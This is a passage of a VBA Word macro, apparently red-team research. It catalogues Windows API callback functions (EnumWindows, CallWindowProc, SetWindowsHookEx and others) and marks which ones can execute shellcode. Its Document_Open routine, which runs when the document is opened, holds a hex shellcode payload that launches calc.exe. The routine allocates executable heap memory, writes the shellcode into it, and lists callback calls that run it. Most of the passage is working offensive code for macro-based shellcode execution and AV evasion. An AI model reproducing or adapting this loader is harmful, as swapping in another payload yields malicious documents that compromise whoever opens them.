Any, ByVal CalType As Any) As Long 40 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal pCalInfoEnumProc As Any, ByVal Locale As Any, ByVal Calendar As Any, ByVal CalType As Any) As Long 41 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumDateFormatsA" (ByVal lpDateFmtEnumProc As Any, ByVal Locale As Any, ByVal dwFlags As Any) As Long 42 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumDateFormatsW" (ByVal lpDateFmtEnumProc As Any, ByVal Locale As Any, ByVal dwFlags As Any) As Long 43 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumDesktopWindows" (ByVal hDesktop As Any, ByVal lpfn As Any, ByVal lParam As Any) As Long 44 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumDesktopsA" (ByVal hwinsta As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 45 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumDesktopsW" (ByVal hwinsta As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 46 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumLanguageGroupLocalesA" (ByVal lpLangGroupLocaleEnumProc As Any, ByVal LanguageGroup As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long 47 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumLanguageGroupLocalesW" (ByVal lpLangGroupLocaleEnumProc As Any, ByVal LanguageGroup As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long 48 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumPropsExA" (ByVal hWnd As Any, ByVal lpEnumFunc As Any) As Long 49 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumPropsExW" (ByVal hWnd As Any, ByVal lpEnumFunc As Any) As Long 50 | 'Private Declare Function shellExecute Lib "powrprof" Alias "EnumPwrSchemes" (ByVal lpfnPwrSchemesEnumProc As Any, ByVal lParam As Any) As Long 51 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceTypesA" (ByVal hModule As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 52 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceTypesW" (ByVal hModule As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 53 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceTypesExA" (ByVal hModule As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any, ByVal dwFlags As Any, ByVal LangId As Any) As Long 54 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceTypesExW" (ByVal hModule As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any, ByVal dwFlags As Any, ByVal LangId As Any) As Long 55 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemCodePagesA" (ByVal lpCodePageEnumProc As Any, ByVal dwFlags As Any) As Long 56 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemCodePagesW" (ByVal lpCodePageEnumProc As Any, ByVal dwFlags As Any) As Long 57 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemLanguageGroupsA" (ByVal lpLanguageGroupEnumProc As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long 58 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemLanguageGroupsW" (ByVal lpLanguageGroupEnumProc As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long 59 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemLocalesA" (ByVal lpLocaleEnumProc As Any, ByVal dwFlags As Any) As Long 60 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemLocalesW" (ByVal lpLocaleEnumProc As Any, ByVal dwFlags As Any) As Long 61 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumThreadWindows" (ByVal dwThreadId As Any, ByVal lpfn As Any, ByVal lParam As Any) As Long 62 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumTimeFormatsA" (ByVal lpTimeFmtEnumProc As Any, ByVal Locale As Any, ByVal dwFlags As Any) As Long 63 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumTimeFormatsW" (ByVal lpTimeFmtEnumProc As Any, ByVal Locale As Any, ByVal dwFlags As Any) As Long 64 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumUILanguagesA" (ByVal lpUILanguageEnumProc As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long 65 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpUILanguageEnumProc As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long 66 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumWindowStationsA" (ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 67 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumWindowStationsW" (ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 68 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumWindows" (ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 69 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "EnumerateLoadedModules" (ByVal hProcess As Any, ByVal EnumLoadedModulesCallback As Any, ByVal UserContext As Any) As Long 70 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "EnumerateLoadedModulesEx" (ByVal hProcess As Any, ByVal EnumLoadedModulesCallback As Any, ByVal UserContext As Any) As Long 71 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "EnumerateLoadedModulesExW" (ByVal hProcess As Any, ByVal EnumLoadedModulesCallback As Any, ByVal UserContext As Any) As Long 72 | 'Private Declare Function shellExecute Lib "user32" Alias "GrayStringA" (ByVal hDC As Any, ByVal hBrush As Any, ByVal lpOutputFunc As Any, ByVal lpData As Any, ByVal nCount As Any, ByVal X As Any, ByVal Y As Any, ByVal nWidth As Any, ByVal nHeight As Any) As Long 73 | 'Private Declare Function shellExecute Lib "user32" Alias "GrayStringW" (ByVal hDC As Any, ByVal hBrush As Any, ByVal lpOutputFunc As Any, ByVal lpData As Any, ByVal nCount As Any, ByVal X As Any, ByVal Y As Any, ByVal nWidth As Any, ByVal nHeight As Any) As Long 74 | 'Private Declare Function shellExecute Lib "iphlpapi" Alias "NotifyIpInterfaceChange" (ByVal Family As Any, ByVal Callback As Any, ByVal CallerContext As Any, ByVal InitialNotification As Any, ByVal NotificationHandle As Any) As Long 75 | 'Private Declare Function shellExecute Lib "iphlpapi" Alias "NotifyTeredoPortChange" (ByVal Callback As Any, ByVal CallerContext As Any, ByVal InitialNotification As Any, ByVal NotificationHandle As Any) As Long 76 | 'Private Declare Function shellExecute Lib "iphlpapi" Alias "NotifyUnicastIpAddressChange" (ByVal Family As Any, ByVal Callback As Any, ByVal CallerContext As Any, ByVal InitialNotification As Any, ByVal NotificationHandle As Any) As Long 77 | 'Private Declare Function shellExecute Lib "shlwapi" Alias "SHCreateThread" (ByVal pfnThreadProc As Any, ByVal pData As Any, ByVal dwFlags As Any, ByVal pfnCallback As Any) As Long 78 | 'Private Declare Function shellExecute Lib "shlwapi" Alias "SHCreateThreadWithHandle" (ByVal pfnThreadProc As Any, ByVal pData As Any, ByVal flags As Any, ByVal pfnCallback As Any, ByVal pHandle As Any) As Long 79 | 'Private Declare Function shellExecute Lib "user32" Alias "SendMessageCallbackA" (ByVal hWnd As Any, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any, ByVal lpCallBack As Any, ByVal dwData As Any) As Long 80 | 'Private Declare Function shellExecute Lib "user32" Alias "SendMessageCallbackW" (ByVal hWnd As Any, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any, ByVal lpCallBack As Any, ByVal dwData As Any) As Long 81 | 'Private Declare Function shellExecute Lib "user32" Alias "SetWinEventHook" (ByVal eventMin As Any, ByVal eventMax As Any, ByVal hmodWinEventProc As Any, ByVal lpfnWinEventProc As Any, ByVal idProcess As Any, ByVal idThread As Any, ByVal dwflags As Any) As Long 82 | 'Private Declare Function shellExecute Lib "user32" Alias "SetWindowsHookExA" (ByVal idHook As Any, ByVal lpfn As Any, ByVal hMod As Any, ByVal dwThreadId As Any) As Long 83 | 'Private Declare Function shellExecute Lib "user32" Alias "SetWindowsHookExW" (ByVal idHook As Any, ByVal lpfn As Any, ByVal hMod As Any, ByVal dwThreadId As Any) As Long 84 | 85 | ' ################## 86 | ' FAILED FUNCTIONS # 87 | ' ################## 88 | 89 | 'Private Declare Function shellExecute Lib "clusapi" Alias "AddClusterNode" (ByVal hCluster As Any, ByVal lpszNodeName As Any, ByVal pfnProgressCallBack As Any, ByVal pvCallbackArg As Any) As Long 90 | 'Private Declare Function shellExecute Lib "bthprops" Alias "BluetoothRegisterForAuthentication" (ByVal pbtdi As Any, ByVal phRegHandle As Any, ByVal pfnCallback As Any, ByVal pvParam As Any) As Long 91 | 'Private Declare Function shellExecute Lib "icm32" Alias "CMTranslateRGBsExt" (ByVal hcmTransform As Any, ByVal lpSrcBits As Any, ByVal bmInput As Any, ByVal dwWidth As Any, ByVal dwHeight As Any, ByVal dwInputStride As Any, ByVal lpDestBits As Any, ByVal bmOutput As Any, ByVal dwOutputStride As Any, ByVal lpfnCallback As Any, ByVal ulCallbackData As Any) As Long 92 | 'Private Declare Function shellExecute Lib "clusapi" Alias "CreateCluster" (ByVal pConfig As Any, ByVal pfnProgressCallBack As Any, ByVal pvCallbackArg As Any) As Long 93 | 'Private Declare Function shellExecute Lib "user32" Alias "CreateDialogIndirectParamA" (ByVal hInstance As Any, ByVal lpTemplate As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal lParamInit As Any) As Long 94 | 'Private Declare Function shellExecute Lib "user32" Alias "CreateDialogIndirectParamW" (ByVal hInstance As Any, ByVal lpTemplate As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal lParamInit As Any) As Long 95 | 'Private Declare Function shellExecute Lib "user32" Alias "CreateDialogParamA" (ByVal hInstance As Any, ByVal lpTemplateName As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal dwInitParam As Any) As Long 96 | 'Private Declare Function shellExecute Lib "user32" Alias "CreateDialogParamW" (ByVal hInstance As Any, ByVal lpTemplateName As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal dwInitParam As Any) As Long 97 | 'Private Declare Function shellExecute Lib "spoolss" Alias "CreatePrintAsyncNotifyChannel" (ByVal pName As Any, ByVal pSchema As Any, ByVal filter As Any, ByVal directionality As Any, ByVal pCallback As Any, ByVal ppChannel As Any) As Long 98 | 'Private Declare Function shellExecute Lib "kernel32" Alias "CreateTimerQueueTimer" (ByVal phNewTimer As Any, ByVal TimerQueue As Any, ByVal Callback As Any, ByVal Parameter As Any, ByVal DueTime As Any, ByVal Period As Any, ByVal Flags As Any) As Long 99 | 'Private Declare Function shellExecute Lib "davcint" Alias "DavRegisterAuthCallback" (ByVal Callback As Any, ByVal Version As Any) As Long 100 | 'Private Declare Function shellExecute Lib "clusapi" Alias "DestroyCluster" (ByVal hCluster As Any, ByVal pfnProgressCallback As Any, ByVal pvCallbackArg As Any, ByVal fdeleteVirtualComputerObjects As Any) As Long 101 | 'Private Declare Function shellExecute Lib "user32" Alias "DialogBoxParamA" (ByVal hInstance As Any, ByVal lpTemplateName As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal dwInitParam As Any) As Long 102 | 'Private Declare Function shellExecute Lib "user32" Alias "DialogBoxParamW" (ByVal hInstance As Any, ByVal lpTemplateName As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal dwInitParam As Any) As Long 103 | 'Private Declare Function shellExecute Lib "user32" Alias "DrawStateA" (ByVal hdc As Any, ByVal hbr As Any, ByVal lpOutputFunc As Any, ByVal lData As Any, ByVal wData As Any, ByVal x As Any, ByVal y As Any, ByVal cx As Any, ByVal cy As Any, ByVal fuFlags As Any) As Long 104 | 'Private Declare Function shellExecute Lib "user32" Alias "DrawStateW" (ByVal hdc As Any, ByVal hbr As Any, ByVal lpOutputFunc As Any, ByVal lData As Any, ByVal wData As Any, ByVal x As Any, ByVal y As Any, ByVal cx As Any, ByVal cy As Any, ByVal fuFlags As Any) As Long 105 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumChildWindows" (hWndParent As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 106 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumEnhMetaFile" (ByVal hdc As Any, ByVal hemf As Any, ByVal lpEnhMetaFunc As Any, ByVal lpData As Any, ByVal lpRect As Any) As Long 107 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumFontFamiliesA" (ByVal hdc As Any, ByVal lpszFamily As Any, ByVal lpEnumFontFamProc As Any, ByVal lParam As Any) As Long 108 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumFontFamiliesW" (ByVal hdc As Any, ByVal lpszFamily As Any, ByVal lpEnumFontFamProc As Any, ByVal lParam As Any) As Long 109 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumFontFamiliesExA" (ByVal hdc As Any, ByVal lpszFamily As Any, ByVal lpEnumFontFamExProc As Any, ByVal lParam As Any, ByVal dwFlags As Any) As Long 110 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumFontFamiliesExW" (ByVal hdc As Any, ByVal lpszFamily As Any, ByVal lpEnumFontFamExProc As Any, ByVal lParam As Any, ByVal dwFlags As Any) As Long 111 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumFontsA" (ByVal hdc As Any, lpFaceName As Any, ByVal lpFontFunc As Any, ByVal lParam As Any) As Long 112 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumFontsW" (ByVal hdc As Any, lpFaceName As Any, ByVal lpFontFunc As Any, ByVal lParam As Any) As Long 113 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumICMProfilesA" (ByVal hdc As Any, ByVal lpEnumICMProfilesFunc As Any, ByVal lParam As Any) As Long 114 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumICMProfilesW" (ByVal hdc As Any, ByVal lpEnumICMProfilesFunc As Any, ByVal lParam As Any) As Long 115 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumMetaFile" (ByVal hdc As Any, ByVal hmf As Any, ByVal lpMetaFunc As Any, ByVal lParam As Any) As Long 116 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumObjects" (ByVal hdc As Any, ByVal nObjectType As Any, ByVal lpObjectFunc As Any, ByVal lParam As Any) As Long 117 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceLanguagesA" (ByVal hModule As Any, ByVal lpType As Any, ByVal lpName As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 118 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceLanguagesW" (ByVal hModule As Any, ByVal lpType As Any, ByVal lpName As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 119 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceLanguagesExA" (ByVal hModule As Any, ByVal lpType As Any, ByVal lpName As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any, ByVal dwFlags As Any, ByVal LangId As Any) As Long 120 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceLanguagesExW" (ByVal hModule As Any, ByVal lpType As Any, ByVal lpName As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any, byval dwFlags as Any, byval LangId as Any) As Long 121 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceNamesA" (ByVal hModule As Any, ByVal lpszType As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 122 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceNamesW" (ByVal hModule As Any, ByVal lpszType As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 123 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceNamesExA" (ByVal hModule As Any, ByVal lpszType As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any, ByVal dwFlags As Any, ByVal LangId As Any) As Long 124 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceNamesExW" (ByVal hModule As Any, ByVal lpszType As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any, ByVal dwFlags As Any, ByVal LangId As Any) As Long 125 | 'Private Declare Function shellExecute Lib "advapi32" Alias "EventRegister" (ByVal ProviderId As Any, ByVal EnableCallback As Any, ByVal CallbackContext As Any, ByVal RegHandle As Any) As Long 126 | 'Private Declare Function shellExecute Lib "kernel32" Alias "GetApplicationRecoveryCallback" (ByVal hProcess As Any, ByVal pRecoveryCallback As Any, ByVal ppvParameter As Any, ByVal pdwPingInterval As Any, ByVal pdwFlags As Any) As Long 127 | 'Private Declare Function shellExecute Lib "gdi32" Alias "LineDDA" (ByVal nXStart As Any, ByVal nYStart As Any, ByVal nXEnd As Any, ByVal nYEnd As Any, ByVal lpLineFunc As Any, ByVal lpData As Any) As Long 128 | 'Private Declare Function shellExecute Lib "iphlpapi" Alias "NotifyStableUnicastIpAddressTable" (ByVal Family As Any, ByVal Table As Any, ByVal CallerCallback As Any, ByVal CallerContext As Any, ByVal NotificationHandle As Any) As Long 129 | 'Private Declare Function shellExecute Lib "advapi32" Alias "PerfStartProvider" (ByVal ProviderGuid As Any, ByVal ControlCallback As Any, ByVal phProvider As Any) As Long 130 | 'Private Declare Function shellExecute Lib "advapi32" Alias "ReadEncryptedFileRaw" (ByVal pfExportCallback As Any, ByVal pvCallbackContext As Any, ByVal pvContext As Any) As Long 131 | 'Private Declare Function shellExecute Lib "kernel32" Alias "RegisterApplicationRecoveryCallback" (ByVal pRecoveryCallback As Any, ByVal pvParameter As Any, ByVal dwPingInterval As Any, ByVal dwFlags As Any) As Long 132 | 'Private Declare Function shellExecute Lib "spoolss" Alias "RegisterForPrintAsyncNotifications" (ByVal pName As Any, ByVal pSchema As Any, ByVal filter As Any, ByVal directionality As Any, ByVal pCallback As Any, ByVal pRegistrationHandler As Any) As Long 133 | 'Private Declare Function shellExecute Lib "advapi32" Alias "RegisterServiceCtrlHandlerExA" (ByVal lpServiceName As Any, ByVal lpHandlerProc As Any, ByVal lpContext As Any) As Long 134 | 'Private Declare Function shellExecute Lib "advapi32" Alias "RegisterServiceCtrlHandlerExW" (ByVal lpServiceName As Any, ByVal lpHandlerProc As Any, ByVal lpContext As Any) As Long 135 | 'Private Declare Function shellExecute Lib "kernel32" Alias "RegisterWaitForSingleObject" (ByVal phNewWaitObject As Any, ByVal hObject As Any, ByVal Callback As Any, ByVal Context As Any, ByVal dwMilliseconds As Any, ByVal dwFlags As Any) As Long 136 | 'Private Declare Function shellExecute Lib "kernel32" Alias "SetTimerQueueTimer" (ByVal phNewTimer As Any, ByVal TimerQueue As Any, ByVal Callback As Any, ByVal Parameter As Any, ByVal DueTime As Any, ByVal Period As Any, ByVal Flags As Any) As Long 137 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "SymEnumLines" (ByVal hProcess As Any, ByVal Base As Any, ByVal Obj As Any, ByVal File As Any, ByVal EnumLinesCallback As Any, ByVal UserContext As Any) As Long 138 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "SymEnumLinesW" (ByVal hProcess As Any, ByVal Base As Any, ByVal Obj As Any, ByVal File As Any, ByVal EnumLinesCallback As Any, ByVal UserContext As Any) As Long 139 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "SymEnumProcesses" (ByVal EnumProcessesCallback As Any, ByVal UserContext As Any) As Long 140 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "SymEnumSourceLines" (ByVal hProcess As Any, ByVal Base As Any, ByVal Obj As Any, ByVal File As Any, ByVal Line As Any, ByVal Flags As Any, ByVal EnumLinesCallback As Any, ByVal UserContext As Any) As Long 141 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "SymEnumSymbols" (ByVal hProcess As Any, ByVal BaseOfDll As Any, ByVal Mask As Any, ByVal EnumSymbolsCallback As Any, ByVal UserContext As Any) As Long 142 | 'Private Declare Function shellExecute Lib "mscms" Alias "TranslateBitmapBits" (ByVal hColorTransform As Any, ByVal pSrcBits As Any, ByVal bmInput As Any, ByVal dwWidth As Any, ByVal dwHeight As Any, ByVal dwInputStride As Any, ByVal pDestBits As Any, ByVal bmOutput As Any, ByVal dwOutputStride As Any, ByVal pfnCallback As Any, ByVal ulCallbackData As Any) As Long 143 | 'Private Declare Function shellExecute Lib "ws2spi" Alias "WPUQueryBlockingCallback" (ByVal dwCatalogEntryId As Any, ByVal lplpfnCallback As Any, ByVal lpdwContext As Any, ByVal lpErrno As Any) As Long 144 | 'Private Declare Function shellExecute Lib "wdsclientapi" Alias "WdsCliTransferFile" (ByVal pwszServer As Any, ByVal pwszNamespace As Any, ByVal pwszRemoteFilePath As Any, ByVal pwszLocalFilePath As Any, ByVal dwFlags As Any, ByVal dwReserved As Any, ByVal pfnWdsCliCallback As Any, ByVal pvUserData As Any, ByVal phTransfer As Any) As Long 145 | 'Private Declare Function shellExecute Lib "wlanapi" Alias "WlanRegisterNotification" (ByVal hClientHandle As Any, ByVal dwNotifSource As Any, ByVal bIgnoreDuplicate As Any, ByVal funcCallback As Any, ByVal pCallbackContext As Any, ByVal pReserved As Any, ByVal pdwdPrevNotifSource As Any) As Long 146 | 'Private Declare Function shellExecute Lib "advapi32" Alias "WriteEncryptedFileRaw" (ByVal pfImportCallback As Any, ByVal pvCallbackContext As Any, ByVal pvContext As Any) As Long 147 | 'Private Declare Function shellExecute Lib "webservices" Alias "WsPullBytes" (ByVal writer As Any, ByVal callback As Any, ByVal callbackState As Any, ByVal error As Any) As Long 148 | 'Private Declare Function shellExecute Lib "winmm" Alias "mciSetYieldProc" (ByVal IDDevice As Any, ByVal yp As Any, ByVal dwYieldData As Any) As Long 149 | 'Private Declare Function shellExecute Lib "winmm" Alias "midiInOpen" (ByVal lphMidiIn As Any, ByVal uDeviceID As Any, ByVal dwCallback As Any, ByVal dwCallbackInstance As Any, ByVal dwFlags As Any) As Long 150 | 151 | ' ############### 152 | ' # MACRO START # 153 | ' ############### 154 | 155 | Private Sub Document_Open() 156 | 157 | Stop 158 | 159 | ' ##################### 160 | ' # Declare Variables # 161 | ' ##################### 162 | 163 | Dim shellCode As String 164 | 165 | Dim shellLength As Byte 166 | Dim byteArray() As Byte 167 | 168 | Dim memoryAddress As Long 169 | 170 | Dim windowHandle As Long 171 | Dim ProcessHandle As Long 172 | Dim threadHandle As Long 173 | Dim moduleHandle As Long 174 | 175 | Dim zL As Long 176 | Dim oL As Long 177 | Dim rL As Long 178 | 179 | zL = 0 180 | oL = 1 181 | 182 | windowHandle = getWindowHandle() 183 | ProcessHandle = getProcessHandle() 184 | threadHandle = getThreadHandle() 185 | moduleHandle = getModuleHandle(vbNullString) 186 | 187 | ' ############# 188 | ' # Shellcode # 189 | ' ############# 190 | 191 | shellCode = "fce8890000006089e531d2648b52308b520c8b52148b72280fb74a2631ff31c0ac3c617c022c20c1cf0d01c7e2f052578b52108b423c01d08b407885c0744a01d0508b48188b582001d3e33c498b348b01d631ff31c0acc1cf0d01c738e075f4037df83b7d2475e2588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe0585f5a8b12eb865d6a018d85b90000005068318b6f87ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd563616c632e65786500" 192 | 193 | ' ############## 194 | ' # Byte Array # 195 | ' ############## 196 | 197 | shellLength = Len(shellCode) / 2 198 | 199 | ReDim byteArray(0 To shellLength) 200 | 201 | ' ############################### 202 | ' # Convert Hex String to Bytes # 203 | ' ############################### 204 | 205 | For i = 0 To shellLength - 1 206 | 207 | If i = 0 Then 208 | pos = i + 1 209 | Else 210 | pos = i * 2 + 1 211 | End If 212 | Value = Mid(shellCode, pos, 2) 213 | byteArray(i) = Val("&H" & Value) 214 | 215 | Next 216 | 217 | ' ################### 218 | ' # Allocate Memory # 219 | ' ################### 220 | 221 | Stop 222 | 223 | ' flAllocationType 0x1000 = MEM_COMMIT 224 | ' flProtect 0x40 = PAGE_EXECUTE_READWRITE 225 | 'memoryAddress = allocateMemory(zL, &H5000, &H1000, &H40) ' WORK VirtualAlloc 226 | 227 | 'memoryAddress = allocateMemory(ByVal -1, rL, zL, &H5000, &H1000, &H40) ' WORK NtAllocateVirtualMemory / ZwAllocateVirtualMemory 228 | 'memoryAddress = rL 229 | 230 | ' flOptions 0x40000 = HEAP_CREATE_ENABLE_EXECUTE 231 | rL = createMemory(&H40000, zL, zL) 232 | memoryAddress = allocateMemory(rL, zL, &H5000) ' WORK HeapAlloc 233 | 234 | ' ############################# 235 | ' # Write Shellcode to Memory # 236 | ' ############################# 237 | 238 | Stop 239 | 240 | 'copyMemory ByVal memoryAddress, byteArray(0), UBound(byteArray) + 1 ' WORK RtlMoveMemory 241 | 242 | copyMemory ByVal -1, memoryAddress, VarPtr(byteArray(0)), UBound(byteArray) + 1, zL ' WORK WriteProcessMemory 243 | 244 | ' ##################### 245 | ' # Execute Shellcode # 246 | ' ##################### 247 | 248 | 'MsgBox (Hex(memoryAddress)) 249 | 250 | Stop 251 | 252 | ' ##################### 253 | ' # WORKING FUNCTIONS # 254 | ' ##################### 255 | 256 | 'executeResult = shellExecute(memoryAddress, zL, zL, zL, zL) ' WORK CallWindowProcA 257 | 'executeResult = shellExecute(memoryAddress, zL, zL, zL, zL) ' WORK CallWindowProcW 258 | 'executeResult = shellExecute(moduleHandle, moduleHandle, windowHandle, memoryAddress, oL) ' WORK DialogBoxIndirectParamA 259 | 'executeResult = shellExecute(moduleHandle, moduleHandle, windowHandle, memoryAddress, oL) ' WORK DialogBoxIndirectParamW 260 | 'rL = 3072 ' LOCALE_CUSTOM_DEFAULT 261 | 'executeResult = shellExecute(memoryAddress, rL, oL, oL) ' WORK EnumCalendarInfoA 262 | 'rL = 3072 ' LOCALE_CUSTOM_DEFAULT 263 | 'executeResult = shellExecute(memoryAddress, rL, oL, oL) ' WORK EnumCalendarInfoW 264 | 'executeResult = shellExecute(memoryAddress, zL, zL) ' WORK EnumDateFormatsA 265 | 'executeResult = shellExecute(memoryAddress, zL, zL) ' WORK EnumDateFormatsW 266 | 'executeResult = shellExecute(zL, memoryAddress, zL) ' WORK EnumDesktopWindows 267 | 'executeResult = shellExecute(zL, memoryAddress, zL) ' WORK EnumDesktopsA 268 | 'executeResult = shellExecute(zL, memoryAddress, zL) ' WORK EnumDesktopsW 269 | 'executeResult = shellExecute(memoryAddress, oL, zL, zL) ' WORK EnumLanguageGroupLocalesA 270 | 'executeResult = shellExecute(memoryAddress, oL, zL, zL) ' WORK EnumLanguageGroupLocalesW 271 | 'executeResult = shellExecute(windowHandle, memoryAddress) ' WORK EnumPropsExA 272 | 'executeResult = shellExecute(windowHandle, memoryAddress) ' WORK EnumPropsExW 273 | 'executeResult = shellExecute(memoryAddress, zL) ' WORK EnumPwrSchemes 274 | 'executeResult = shellExecute(zL, memoryAddress, zL) ' WORK EnumResourceTypesA 275 | 'executeResult = shellExecute(zL, memoryAddress, zL) ' WORK EnumResourceTypesW 276 | 'executeResult = shellExecute(zL, memoryAddress, zL, zL, zL) ' WORK EnumResourceTypesExA 277 | 'executeResult = shellExecute(zL, memoryAddress, zL, zL, zL) ' WORK EnumResourceTypesExW 278 | 'executeResult = shellExecute(memoryAddress, zL) ' WORK EnumSystemCodePagesA 279 | 'executeResult = shellExecute(memoryAddress, zL) ' WORK EnumSystemCodePagesW 280 | 'executeResult = shellExecute(memoryAddress, zL, zL) ' WORK EnumSystemLanguageGroupsA 281 | 'executeResult = shellExecute(memoryAddress, zL, zL) ' WORK EnumSystemLanguageGroupsW 282 | 'executeResult = shellExecute(memoryAddress, zL) ' WORK EnumSystemLocalesA 283 | 'executeResult = shellExecute(memoryAddress, zL) ' WORK EnumSystemLocalesW 284 | 'executeResult = shellExecute(zL, memoryAddress, zL) ' WORK EnumThreadWindows 285 | 'executeResult = shellExecute(memoryAddress, zL, zL) ' WORK EnumTimeFormatsA 286 | 'executeResult = shellExecute(memoryAddress, zL, zL) ' WORK EnumTimeFormatsW 287 | 'executeResult = shellExecute(memoryAddress, zL, zL) ' WORK EnumUILanguagesA 288 | 'executeResult = shellExecute(memoryAddress, zL, zL) ' WORK EnumUILanguagesW 289 | 'executeResult = shellExecute(memoryAddress, zL) ' WORK EnumWindowStationsA 290 | 'executeResult = shellExecute(memoryAddress, zL) ' WORK EnumWindowStationsW 291 | 'executeResult = shellExecute(memoryAddress, zL) ' WORK EnumWindows 292 | 'executeResult = shellExecute(processHandle, memoryAddress, zL) ' WORK EnumerateLoadedModules 293 | 'executeResult = shellExecute(processHandle, memoryAddress, zL) ' WORK EnumerateLoadedModulesEx 294 | 'executeResult = shellExecute(processHandle, memoryAddress, zL) ' WORK EnumerateLoadedModulesExW 295 | 'executeResult = shellExecute(moduleHandle, oL, memoryAddress, oL, oL, oL, oL, oL, oL) ' WORK GrayStringA 296 | 'executeResult = shellExecute(moduleHandle, oL, memoryAddress, oL, oL, oL, oL, oL, oL) ' WORK GrayStringW 297 | 'executeResult = shellExecute(zL, memoryAddress, oL, oL, oL) ' WORK NotifyIpInterfaceChange 298 | 'executeResult = shellExecute(memoryAddress, oL, oL, oL) ' WORK NotifyTeredoPortChange 299 | 'executeResult = shellExecute(zL, memoryAddress, oL, oL, oL) ' WORK NotifyUnicastIpAddressChange 300 | 'executeResult = shellExecute(zL, zL, zL, memoryAddress) ' WORK SHCreateThread 301 | 'executeResult = shellExecute(zL, zL, zL, memoryAddress, processHandle) ' WORK SHCreateThreadWithHandle 302 | 'executeResult = shellExecute(windowHandle, zL, zL, zL, memoryAddress, zL) 